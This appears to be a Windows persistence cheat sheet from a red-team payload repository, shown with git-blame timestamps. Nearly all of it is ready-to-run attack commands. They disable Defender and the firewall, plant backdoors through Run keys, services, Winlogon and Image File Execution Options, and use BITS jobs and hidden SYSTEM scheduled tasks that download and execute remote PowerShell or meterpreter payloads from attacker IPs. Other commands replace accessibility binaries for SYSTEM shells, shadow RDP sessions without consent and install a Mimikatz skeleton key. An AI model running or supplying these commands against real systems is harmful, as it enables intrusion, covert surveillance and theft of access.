2018-04-27 21:31:58 +00:00
|
|
|
|
# Windows - Persistence
|
|
|
|
|
|
2019-08-18 20:24:48 +00:00
|
|
|
|
## Summary
|
|
|
|
|
|
2019-09-13 15:38:23 +00:00
|
|
|
|
* [Tools](#tools)
|
2020-02-01 21:12:36 +00:00
|
|
|
|
* [Disable Windows Defender](#disable-windows-defender)
|
|
|
|
|
* [Disable Windows Firewall](#disable-windows-firewall)
|
2020-07-21 17:48:57 +00:00
|
|
|
|
* [Simple User](#simple-user)
|
2020-06-01 19:37:32 +00:00
|
|
|
|
* [Registry HKCU](#registry-hkcu)
|
2019-08-18 20:24:48 +00:00
|
|
|
|
* [Startup](#startup)
|
2020-09-30 09:46:04 +00:00
|
|
|
|
* [Scheduled Tasks User](#scheduled-tasks-user)
|
2020-06-01 19:37:32 +00:00
|
|
|
|
* [BITS Jobs](#bits-jobs)
|
2020-02-20 15:51:22 +00:00
|
|
|
|
* [Serviceland](#serviceland)
|
|
|
|
|
* [IIS](#iis)
|
|
|
|
|
* [Windows Service](#windows-service)
|
2019-08-18 20:24:48 +00:00
|
|
|
|
* [Elevated](#elevated)
|
2020-06-01 19:37:32 +00:00
|
|
|
|
* [Registry HKLM](#registry-hklm)
|
|
|
|
|
* [Winlogon Helper DLL](#)
|
|
|
|
|
* [GlobalFlag](#)
|
2020-09-30 09:46:04 +00:00
|
|
|
|
* [Services Elevated](#services-elevated)
|
|
|
|
|
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
|
2020-05-13 21:07:39 +00:00
|
|
|
|
* [Binary Replacement](#binary-replacement)
|
|
|
|
|
* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
|
|
|
|
|
* [Binary Replacement on Windows 10+](#binary-replacement-on-windows-10)
|
2019-11-26 22:39:14 +00:00
|
|
|
|
* [RDP Backdoor](#rdp-backdoor)
|
2020-05-13 21:07:39 +00:00
|
|
|
|
* [utilman.exe](#utilman.exe)
|
|
|
|
|
* [sethc.exe](#sethc.exe)
|
2020-10-30 20:10:00 +00:00
|
|
|
|
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
|
2020-05-03 14:28:17 +00:00
|
|
|
|
* [Skeleton Key](#skeleton-key)
|
2019-08-18 20:24:48 +00:00
|
|
|
|
* [References](#references)
|
|
|
|
|
|
|
|
|
|
|
2019-09-13 15:38:23 +00:00
|
|
|
|
## Tools
|
|
|
|
|
|
|
|
|
|
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
|
|
|
|
|
2020-02-01 21:12:36 +00:00
|
|
|
|
## Disable Windows Defender
|
|
|
|
|
|
|
|
|
|
```powershell
|
2021-01-08 22:41:50 +00:00
|
|
|
|
# Disable Defender
|
2020-02-01 21:12:36 +00:00
|
|
|
|
sc config WinDefend start= disabled
|
|
|
|
|
sc stop WinDefend
|
|
|
|
|
Set-MpPreference -DisableRealtimeMonitoring $true
|
2021-01-08 22:41:50 +00:00
|
|
|
|
|
|
|
|
|
## Exclude a process / location
|
|
|
|
|
Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"
|
|
|
|
|
Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
|
|
|
|
|
Add-MpPreference -ExclusionPath C:\Video, C:\install
|
2020-02-01 21:12:36 +00:00
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Disable Windows Firewall
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
Netsh Advfirewall show allprofiles
|
|
|
|
|
NetSh Advfirewall set allprofiles state off
|
|
|
|
|
|
|
|
|
|
# ip whitelisting
|
|
|
|
|
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
|
|
|
|
|
```
|
|
|
|
|
|
2020-07-21 17:48:57 +00:00
|
|
|
|
## Simple User
|
2018-04-27 21:31:58 +00:00
|
|
|
|
|
2020-01-19 21:46:45 +00:00
|
|
|
|
Set a file as hidden
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
attrib +h c:\autoexec.bat
|
|
|
|
|
```
|
|
|
|
|
|
2020-07-21 17:48:57 +00:00
|
|
|
|
### Registry HKCU
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
```powershell
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Value name: Backdoor
|
|
|
|
|
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
|
|
|
|
```
|
|
|
|
|
|
2020-06-01 19:37:32 +00:00
|
|
|
|
Using the command line
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
|
|
|
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
|
|
|
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
|
|
|
|
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe"
|
|
|
|
|
```
|
|
|
|
|
|
2019-09-13 15:38:23 +00:00
|
|
|
|
Using SharPersist
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
|
|
|
|
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
|
|
|
|
|
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
|
|
|
|
|
```
|
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
### Startup
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Create a batch script in the user startup folder.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
```powershell
|
2018-04-27 21:31:58 +00:00
|
|
|
|
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
|
|
|
|
|
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
|
|
|
|
```
|
|
|
|
|
|
2019-09-13 15:38:23 +00:00
|
|
|
|
Using SharPersist
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
|
|
|
|
|
```
|
|
|
|
|
|
2020-09-30 09:46:04 +00:00
|
|
|
|
### Scheduled Tasks User
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2020-10-15 10:35:05 +00:00
|
|
|
|
Using native **schtask**
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
# Create the scheduled tasks to run once at 00.00
|
|
|
|
|
schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe
|
|
|
|
|
# Force run it now !
|
|
|
|
|
schtasks /run /tn "Device-Synchronize"
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Using Powershell
|
|
|
|
|
|
2018-08-12 21:30:22 +00:00
|
|
|
|
```powershell
|
2018-04-27 21:31:58 +00:00
|
|
|
|
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
|
|
|
|
|
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
|
|
|
|
|
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
|
|
|
|
|
PS C:\> $S = New-ScheduledTaskSettingsSet
|
|
|
|
|
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
|
|
|
|
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
|
|
|
|
```
|
|
|
|
|
|
2019-09-13 15:38:23 +00:00
|
|
|
|
Using SharPersist
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
# Add to a current scheduled task
|
|
|
|
|
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
|
|
|
|
|
|
|
|
|
|
# Add new task
|
|
|
|
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
|
|
|
|
|
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
|
|
|
|
```
|
|
|
|
|
|
2020-06-01 19:37:32 +00:00
|
|
|
|
|
|
|
|
|
### BITS Jobs
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
bitsadmin /create backdoor
|
|
|
|
|
bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe"
|
|
|
|
|
|
|
|
|
|
# v1
|
|
|
|
|
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL
|
|
|
|
|
bitsadmin /SetMinRetryDelay "backdoor" 60
|
|
|
|
|
bitsadmin /resume backdoor
|
|
|
|
|
|
|
|
|
|
# v2 - exploit/multi/script/web_delivery
|
|
|
|
|
bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll"
|
|
|
|
|
bitsadmin /resume backdoor
|
|
|
|
|
```
|
|
|
|
|
|
2020-02-20 15:51:22 +00:00
|
|
|
|
## Serviceland
|
|
|
|
|
|
|
|
|
|
### IIS
|
|
|
|
|
|
|
|
|
|
IIS Raid – Backdooring IIS Using Native Modules
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
$ git clone https://github.com/0x09AL/IIS-Raid
|
|
|
|
|
$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS
|
|
|
|
|
C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Windows Service
|
2019-09-13 15:38:23 +00:00
|
|
|
|
|
|
|
|
|
Using SharPersist
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
|
|
|
|
|
```
|
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
## Elevated
|
|
|
|
|
|
2020-06-01 19:37:32 +00:00
|
|
|
|
### Registry HKLM
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
```powershell
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Value name: Backdoor
|
|
|
|
|
Value data: C:\Windows\Temp\backdoor.exe
|
|
|
|
|
```
|
|
|
|
|
|
2020-06-01 19:37:32 +00:00
|
|
|
|
Using the command line
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe"
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Winlogon Helper DLL
|
|
|
|
|
|
|
|
|
|
> Run executable during Windows logon
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe
|
|
|
|
|
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll
|
|
|
|
|
|
|
|
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f
|
|
|
|
|
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f
|
|
|
|
|
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force
|
|
|
|
|
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### GlobalFlag
|
|
|
|
|
|
|
|
|
|
> Run executable after notepad is killed
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
|
|
|
|
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
|
|
|
|
|
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
2020-09-30 09:46:04 +00:00
|
|
|
|
### Services Elevated
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2018-04-27 21:31:58 +00:00
|
|
|
|
Create a service that will start automatically or on-demand.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
```powershell
|
2020-09-30 09:46:04 +00:00
|
|
|
|
# Powershell
|
|
|
|
|
New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic
|
|
|
|
|
sc start pentestlab
|
|
|
|
|
|
|
|
|
|
# SharPersist
|
|
|
|
|
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add
|
|
|
|
|
|
|
|
|
|
# sc
|
|
|
|
|
sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="LocalSystem"
|
|
|
|
|
sc start Backdoor
|
2018-04-27 21:31:58 +00:00
|
|
|
|
```
|
|
|
|
|
|
2020-09-30 09:46:04 +00:00
|
|
|
|
### Scheduled Tasks Elevated
|
|
|
|
|
|
|
|
|
|
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2020-09-30 09:46:04 +00:00
|
|
|
|
> Processes spawned as scheduled tasks have taskeng.exe process as their parent
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
```powershell
|
2020-09-30 09:46:04 +00:00
|
|
|
|
# Powershell
|
|
|
|
|
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\backdoor.exe"
|
|
|
|
|
$T = New-ScheduledTaskTrigger -Daily -At 9am
|
|
|
|
|
# OR
|
|
|
|
|
$T = New-ScheduledTaskTrigger -Daily -At "9/30/2020 11:05:00 AM"
|
|
|
|
|
$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
|
|
|
|
|
$S = New-ScheduledTaskSettingsSet
|
|
|
|
|
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
|
|
|
|
Register-ScheduledTask "Backdoor" -InputObject $D
|
|
|
|
|
|
|
|
|
|
# Native schtasks
|
|
|
|
|
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM"
|
|
|
|
|
schtasks /create /sc minute /mo 1 /tn "eviltask" /tr calc /ru "SYSTEM" /s dc-mantvydas /u user /p password
|
|
|
|
|
|
|
|
|
|
##(X86) - On User Login
|
|
|
|
|
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System
|
|
|
|
|
|
|
|
|
|
##(X86) - On System Start
|
|
|
|
|
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System
|
|
|
|
|
|
|
|
|
|
##(X86) - On User Idle (30mins)
|
|
|
|
|
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
|
|
|
|
|
|
|
|
|
|
##(X64) - On User Login
|
|
|
|
|
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System
|
|
|
|
|
|
|
|
|
|
##(X64) - On System Start
|
|
|
|
|
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System
|
|
|
|
|
|
|
|
|
|
##(X64) - On User Idle (30mins)
|
|
|
|
|
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
|
2018-04-27 21:31:58 +00:00
|
|
|
|
```
|
|
|
|
|
|
2020-05-13 21:07:39 +00:00
|
|
|
|
### Binary Replacement
|
|
|
|
|
|
|
|
|
|
#### Binary Replacement on Windows XP+
|
|
|
|
|
|
|
|
|
|
| Feature | Executable |
|
|
|
|
|
|---------------------|---------------------------------------|
|
|
|
|
|
| Sticky Keys | C:\Windows\System32\sethc.exe |
|
|
|
|
|
| Accessibility Menu | C:\Windows\System32\utilman.exe |
|
|
|
|
|
| On-Screen Keyboard | C:\Windows\System32\osk.exe |
|
|
|
|
|
| Magnifier | C:\Windows\System32\Magnify.exe |
|
|
|
|
|
| Narrator | C:\Windows\System32\Narrator.exe |
|
|
|
|
|
| Display Switcher | C:\Windows\System32\DisplaySwitch.exe |
|
|
|
|
|
| App Switcher | C:\Windows\System32\AtBroker.exe |
|
|
|
|
|
|
2020-06-01 19:37:32 +00:00
|
|
|
|
In Metasploit : `use post/windows/manage/sticky_keys`
|
|
|
|
|
|
2020-05-13 21:07:39 +00:00
|
|
|
|
#### Binary Replacement on Windows 10+
|
|
|
|
|
|
|
|
|
|
Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable.
|
|
|
|
|
|
|
|
|
|
Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`.
|
|
|
|
|
|
|
|
|
|
|
2019-11-26 22:39:14 +00:00
|
|
|
|
### RDP Backdoor
|
|
|
|
|
|
|
|
|
|
#### utilman.exe
|
|
|
|
|
|
|
|
|
|
At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
|
|
|
|
|
|
|
|
|
|
```powershell
|
2020-02-20 15:51:22 +00:00
|
|
|
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
2019-11-26 22:39:14 +00:00
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
#### sethc.exe
|
|
|
|
|
|
|
|
|
|
Hit F5 a bunch of times when you are at the RDP login screen.
|
|
|
|
|
|
|
|
|
|
```powershell
|
2020-02-20 15:51:22 +00:00
|
|
|
|
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
|
2019-11-26 22:39:14 +00:00
|
|
|
|
```
|
|
|
|
|
|
2020-10-30 20:10:00 +00:00
|
|
|
|
### Remote Desktop Services Shadowing
|
|
|
|
|
|
|
|
|
|
:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.
|
|
|
|
|
|
|
|
|
|
Requirements:
|
|
|
|
|
* RDP must be running
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
|
|
|
|
|
# 4 – View Session without user’s permission.
|
|
|
|
|
|
|
|
|
|
# Allowing remote connections to this computer
|
|
|
|
|
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
# Disable UAC remote restriction
|
|
|
|
|
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
|
|
|
|
|
|
|
|
|
|
mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
|
|
|
|
|
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
|
|
|
|
|
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID;
|
|
|
|
|
# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent;
|
|
|
|
|
# /prompt parameter is used to specify a user’s credentials to connect to a remote host.
|
|
|
|
|
```
|
|
|
|
|
|
2020-05-03 14:28:17 +00:00
|
|
|
|
### Skeleton Key
|
|
|
|
|
|
|
|
|
|
```powershell
|
|
|
|
|
# Exploitation Command runned as DA:
|
|
|
|
|
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DCs FQDN>
|
|
|
|
|
|
|
|
|
|
# Access using the password "mimikatz"
|
|
|
|
|
Enter-PSSession -ComputerName <AnyMachineYouLike> -Credential <Domain>\Administrator
|
|
|
|
|
```
|
2019-11-26 22:39:14 +00:00
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
## References
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
|
|
|
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
2019-09-13 15:38:23 +00:00
|
|
|
|
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
2020-02-20 15:51:22 +00:00
|
|
|
|
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
2020-05-13 21:07:39 +00:00
|
|
|
|
* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
|
2020-06-01 19:37:32 +00:00
|
|
|
|
* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)
|
|
|
|
|
* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md)
|
|
|
|
|
* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/)
|
|
|
|
|
* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
|
|
|
|
|
* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
|
|
|
|
|
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
|